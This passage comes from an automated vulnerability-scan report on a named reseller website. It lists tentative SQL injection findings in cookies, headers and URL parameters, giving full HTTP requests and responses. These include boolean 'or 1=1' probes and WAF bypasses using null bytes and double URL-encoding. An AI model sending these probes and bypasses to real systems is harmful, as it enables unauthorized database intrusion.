Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The COOKIE_SORT_ORDER cookie appears to be vulnerable to SQL injection attacks. The payloads 69795934'%20or%201%3d1--%20 and 69795934'%20or%201%3d2--%20 were each submitted in the COOKIE_SORT_ORDER cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /user_detail.php?u=roreevoweva HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc69795934'%20or%201%3d1--%20; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />
<br />
<b>Warning</b>: mysql_select_db(): supplied argument is not a valid MySQL-Link resource in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />
<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/filters/filter.gzip_compression.php</b> on line <b>0</b><br />

Request 2

GET /user_detail.php?u=roreevoweva HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc69795934'%20or%201%3d2--%20; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<link href="http://www.resellerbase.com/themes/kosmos/styles.css" rel="stylesheet" type="text/css" />
<link href="http://www.resellerbase.com/themes/kosmos/calendar-system.css" rel="stylesheet" type="text/css" />
<base href="http://www.resellerbase.com/" />
</head>
<body>
<table width="770" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<!-- header start -->

<table width="770" border="0" cellspacing="0" cellpadding="0">
<tr>
<td valign="middle" style="background-image: url('http://www.resellerbase.com/themes/kosmos/images/template_01.gif')" height="18">
<div align="right">
<a href="http://www.resellerbase.com/" class="top_menu">Home</a> |&nbsp;
<a href="http://www.resellerbase.com/cp/" class="top_menu">My Account</a> |&nbsp;
<a href="http://www.resellerbase.com/power_search.php" class="top_menu">Power Search</a> |&nbsp;
<a href="http://www.resellerbase.com/register.php" class="top_menu">Register</a> |&nbsp;
<a href="http://www.resellerbase.com/user_search.php?pflag=search" class="top_menu">Member List</a> |&nbsp;
<a href="http://www.resellerbase.com/suggest_category.php" class="top_menu">Suggest Category</a>&nbsp;
</div>
</td>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="http://www.resellerbase.com/themes/kosmos/images/logo.gif" width="218" height="78" border="0" alt="" /></td>
<td><a href="http://www.resellerbas
...[SNIP]...

1.13. http://www.resellerbase.com/user_detail.php [PHPSESSID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /user_detail.php?u=tatumal HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da%00';

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=tatumal HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da%00'';

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=187614a5c9458cc396f2ba1d48006e50; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.14. http://www.resellerbase.com/user_detail.php [PHPSESSID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PHPSESSID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user_detail.php?u=tarekchoudhury HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da%2527;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=tarekchoudhury HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.15. http://www.resellerbase.com/user_detail.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /user_detail.php%00'?u=permeapsecalk HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php%00''?u=permeapsecalk HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 46374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>TOP 100 Reseller pro
...[SNIP]...

1.16. http://www.resellerbase.com/user_detail.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /user_detail.php?u=pyncwaype HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=pyncwaype HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.17. http://www.resellerbase.com/user_detail.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /user_detail.php?u=tagerorry HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)%00'
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=tagerorry HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)%00''
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.18. http://www.resellerbase.com/user_detail.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /user_detail.php?u=roockydak HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)'
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=roockydak HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)''
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.19. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /user_detail.php?u=purdue512&1%00'=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=purdue512&1%00''=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.20. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /user_detail.php?u=rimi/1'nela HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=rimi/1''nela HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.21. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The u parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /user_detail.php?u=rusdetectiv' HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=rusdetectiv'' HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.22. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The u parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the u request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user_detail.php?u=thossenugmoms%2527 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 636
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.p
...[SNIP]...
<b>Fatal error</b>
...[SNIP]...

Request 2

GET /user_detail.php?u=thossenugmoms%2527%2527 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...

1.23. http://www.resellerbase.com/web-service/other/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.resellerbase.com
Path:   /web-service/other/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /web-service'/other/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response 1

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

Request 2

GET /web-service''/other/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response 2

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:28:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...

2. Cross-site scripting (reflected)
There are 5635 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

